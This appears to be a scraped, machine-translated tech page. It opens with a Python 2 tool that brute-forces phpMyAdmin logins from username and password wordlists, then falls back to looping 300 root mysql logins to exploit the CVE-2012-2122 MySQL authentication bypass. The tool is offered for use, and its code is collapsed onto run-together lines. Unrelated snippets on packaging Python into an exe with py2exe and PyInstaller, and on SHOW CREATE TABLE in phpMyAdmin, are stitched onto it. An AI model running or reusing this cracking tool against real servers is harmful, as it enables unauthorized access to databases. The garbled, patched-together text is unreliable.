PHPMyAdmin brute-force cracking tool code written in Python, pythonphpmyadmin

PHPMyAdmin brute-force cracking tool code written in Python, pythonphpmyadmin

PHPMyAdmin brute force cracking, coupled with CVE-2012-2122 MySQL Authentication Bypass Vulnerability exploitation.

#!/usr/bin/env pythonimport urllib import urllib2 import cookielib import sysimport subprocessdef Crack(url,username,password):opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}params = urllib.urlencode({'pma_username': username, 'pma_password': password})request = urllib2.Request(url+"/index.php", params,headers)response = opener.open(request) a=response.read() if a.find('Database server')!=-1 and a.find('name="login_form"')==-1:return username,passwordreturn 0def MySQLAuthenticationBypassCheck(host,port):i=0while i<300:i=i+1subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait()if __name__ == '__main__':if len(sys.argv)<4:print "#author:iswin\n#useage python pma.py http://www.bkjia.com/phpmyadmin/ username.txt password.txt"sys.exit()print "Bruting,Pleas wait..."for name in open(sys.argv[2],"r"):for passw in open(sys.argv[3],"r"):state=Crack(sys.argv[1],name,passw)if state!=0:print "\nBrute successful"print "UserName: "+state[0]+"PassWord: "+state[1]sys.exit()print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck"choice=raw_input('Warning:This function needs mysql environment.\nY:Try to MySQLAuthenticationBypassCheck\nOthers:Exit\n')if choice=='Y' or choice=='y':host=raw_input('Host:')port=raw_input('Port:')MySQLAuthenticationBypassCheck(host,port)

How can I write a tool and explain the process? For example, how can I compile the code after writing Python? What if the source code published by people on the Internet is used?

It is very interesting to compile python code into files related to exe. Many software will compile python code into files related to exe in this step, the following is a detailed description of the article. Hope you will have some gains.
Py2exe
Download the file (Link) first, and install the file easily. Create an example file foobar. py:
Print "foobar"

Create an installation file setup. py:
From distutils. core import setup import py2exe setup (console = ['foobar. py'])

Run:
Python setup. py py2exe

Pyinstaller
Download the file (Link) first, and extract it to a proper location. Create an example file foobar. py:
Print "foobar"

The following operations are performed in the decompressed directory (the following code is helpful for compiling python code into an exe file ). Configure pyinstaller:
Python Configure. py

Generate the spec file:
Python Makespec. py-F-c foobar. py

Run:
Python Build. py foobar/foobar. spec

Ps: py2exe can also be packaged into only one exe package without library.zip. The preceding section describes how to compile python code into an exe file.

How does PHPMyadmin obtain the code for creating a created table?

Use the show create table statement for query. For example:
SHOWCREATETABLE 'tb _ app' -- display the table creation statement of the tb_app table.
The query results may be incomplete. Click print preview below.

Another method is to export the exported file.